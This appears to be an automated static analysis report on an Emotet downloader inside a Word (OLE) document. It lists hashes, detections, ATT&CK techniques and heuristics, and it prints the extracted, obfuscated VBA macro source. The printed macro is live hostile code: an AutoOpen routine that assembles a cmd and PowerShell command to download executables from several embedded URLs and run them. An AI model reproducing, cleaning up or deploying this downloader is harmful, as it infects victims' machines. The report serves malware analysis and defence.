Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a5e1272a9bb32f43…

MALICIOUS

Office (OLE)

69.2 KB First seen: 2020-01-07
MD5: bba7ae56e050e2641c98ffc2beeca668 SHA-1: f905d509871802eed4bea69a575f5672f5fe0b79 SHA-256: a5e1272a9bb32f43f761e76ab352a25eb1c3584495c391ad670b1b5448ddcacf
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains critical heuristics for VBA macros and a Shell() call, strongly indicating malicious intent. ClamAV identifies it as 'Doc.Downloader.Emotet-6884067-0'. The VBA script, though obfuscated, contains elements that suggest it attempts to download and execute a second-stage payload, likely leveraging the reconstructed command string 'cmd /V:O /C "set Z5IA= } {kaerb;Amd$^ " ;Amd$^ ,adq$(elifd aoln w oD.FCC ${yr t {)DR F$^ n i adq$(hcaero f;' ex e.'+VVM$+'\' + cilbup:vne$^ =Amd$^;'536' = VV M$^;)^'@'(tilpS.^'hFzgH Jm/yb.xul-arolf.www//:ptth@wkqXjOG/ku.'

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-6884067-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884067-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4418 bytes
SHA-256: 1f754dcb354c1f1e184634abdbd5c59b1d73d6d60126f3331374c2641c22a360
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZIhIpmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If ozvjrE Xor GtljZ Then

wauzF = "OCFSwJ"
End If
   If pmJTl <= 12 Then

ALJWOw = "kNRVZf"
End If
   If pdoLt = shwdrl Then

umfnIY = "DBpGtYXJbwiSEY"
End If
   If Hstwwk >= mChjq Then

irztwI = "YkjSCRR"
End If
jmHtqvtib (KeyString(mVWBG + hwZbkZU + 17 + 19 + 31 + vwIkQY + wdpow) + BJmAnzj + dcXoWj + KeyString(jEdjFZlN + Ddquka + 20 + 21 + 36 + bnUwULi + oAvlO) + wmwaJ + morOjcjH + bOfhVCUKH + fkwzPzSQ + qwnOItzK)
   If hRVPjG <= wZjJh Then

mIXczn = "Wp"
End If
End Sub


Attribute VB_Name = "jMohWYEOYPKN"
Function wmwaJ()
If YXKTOi <= VsFua Then

pNYloM = "fTbIlX"
End If
   If lIODrc <= iGzwwr Then

amffN = "BGpnuFFjcjduo"
End If
RLluMEkdW = "d /V^:^O/C" + """" + "^s^e^t Z^5^I^A=^ " + "^ ^ ^ ^ ^ ^  ^ ^" + " ^ ^ ^  ^ ^ ^ ^}^" + "}^{hc^tac^}^;^k^a^e" + "r^b^;^A^m^d^$^ ^"
If TDIhR And PULzQ Then

lzhziH = "PLsGbiGEvBhra"
End If
RhwDw = "m^e^t^I^-^" + "e^k^ovn^I^;" + ")^A^m^d^$^ ^,^a^d^" + "q$(^e^li^F^d^ao^ln^"
If fzLiB > 12 Then

baQNnw = "Eq"
End If
   If zhCLzU > 13 Then

dIqwm = "jNlbGQI"
End If
   If Bmtjn = 7 Then

DZpwhu = "uJGQKm"
End If
QjOEVlZOJ = "w^o^D^.^FCC^$^{^yr^" + "t^{)DR^F^$^ n^i^ ^a^" + "d^q^$(hc^a^er^" + "o^f^;^'^e^xe^.^'^+V"
NCBWTpJz = "V^M^$^+^'^\^'" + "+c^il^b^u^p^:vn^e^$^" + "=^A^m^d^$^;'" + "^5^36^'^ ^=^ VV^" + "M^$^;)^'^@^'(^t^i^l^" + "pS^.^'^h^F^z^g^H"
If kwjFiI <= NvVpDV Then

JfCFz = "Sa"
End If
wtwiFzXM = "^J^m/^y^b^.^x^u^" + "l^-^ar^o^l^" + "f^.w^w^w//^:p^t^t^h^" + "@^w^k^q^X^jO^G/k" + "^u^.^oc^.c^"
UlzhYbfWU = "p^4^xi^f^.^w^w^w" + "//:^p^tt^h^@^Pw1r" + "^t^8/r^b^.^m" + "^oc^.^s^a^o^g^al^et" + "e^sr^a^s^s"
wmwaJ = RLluMEkdW + RhwDw + QjOEVlZOJ + NCBWTpJz + wtwiFzXM + UlzhYbfWU
   If sOoDH <> kobPc Then

sQuPBK = "CZIGAdYuY"
End If
   If knYBlV >= LJtzjw Then

Vlmaj = "jinvdrwdfiw"
End If
   If izDTFv >= ifRwzI Then

LKkaC = "dT"
End If
   If kzbbJ <= 16 Then

GQmYVk = "ODlnwFl"
End If
End Function
Function morOjcjH()
If oTVkC Or 14 Then

jLfWn = "HwBlJNijcLQDj"
End If
   If jHnaiP <= pukih Then

KzhTf = "EZAs"
End If
GPLWG = "^er^p^x^e^.w^w^w" + "//^:p^t^t^h@3O^T^" + "54^ec/^s^e^."
If sWdXR Or YvACFu Then

VEiHR = "sswFqUzv"
End If
   If nOiPw And uwrFs Then

wVtnL = "LiMTQnNIpdD"
End If
kCljiPYmQi = "^er^e^k^e^t^.^w" + "^w^w//^:^p^t^t^h@" + "^E^p^g^6^I/^" + "m^oc^.^p^u^i"
If zmYjv > dsPiFS Then

pElivI = "Pnc"
End If
   If ZLuRmC Or sXFjk Then

VCVCM = "o"
End If
   If DKwHNa Xor zTMIs Then

GiOfp = "f"
End If
   If NRQiM Eqv UqMKco Then

ahlCIh = "fdwt"
End If
   If RtZBz > Vwczm Then

LjHYMS = "ai"
End If
AMEHQYXnFZ = "^gn^a^ba^u^m.^w^w" + "^w//^:^p^t^" + "t^h^'^=^DR^F^$^" + ";^tn^e^i^lC^b"
morOjcjH = GPLWG + kCljiPYmQi + AMEHQYXnFZ
   If POIht > 16 Then

szZpjU = "zXFbFOj"
End If
   If tkzbQ Eqv 18 Then

izfqj = "rddz"
End If
End Function
Function bOfhVCUKH()
IjQDz = "^e^W^.^t^eN^ ^t" + "c^e^j^b^o^-^w^en^=" + "^FCC^$ ^l^l^e" + "^h^sr^ew^o^p&&^f^" + "or /^L %^s " + "^in (^3^7^9^,^-^1"
If UwHhnG > skwoO Then

EzsMR = "ra"
End If
   If sNKTjq Xor 14 Then

CYkODb = "i"
End If
   If Episk >= oXmhrp Then

MuFGoa = "uznIjOKPmOnYku"
End If
   If dBuTu < 9 Then

rCdwiP = "RMqKj"
End If
wPFDGOqvr = "^,^0)^d^o ^s^e" + "^t ^U^2^y=" + "!^U^2^y!!Z^5" + "^I^A:~%^s,1!&&^i^f" + " %^s=^=^0 c^a^l^l %^" + "U^2^y:^~^-^3^8"
EHTkqQON = "^0%" + """" + ""
bOfhVCUKH = IjQDz + wPFDGOqvr + EHTkqQON
   If mvpnA <> CXoco Then

KZWQQ = "wr"
End If
   If PYkYt And EpJBv Then

DICVwF = "QzizZEl"
End If
   If KwkwWk = LTHuED Then

MHsnG = "hTR"
End If
   If NlSwZ Xor hXPPf Then

MJCAk = "GCV"
End If
End Function


Attribute VB_Name = "jQJwTrFjI"
Function jmHtqvtib(RAfflt As String)
Const cshrXuVAjC = 264242985 - 264242985
   If lRCWj >= sKniW Then

ScAcu = "Tb
... (truncated)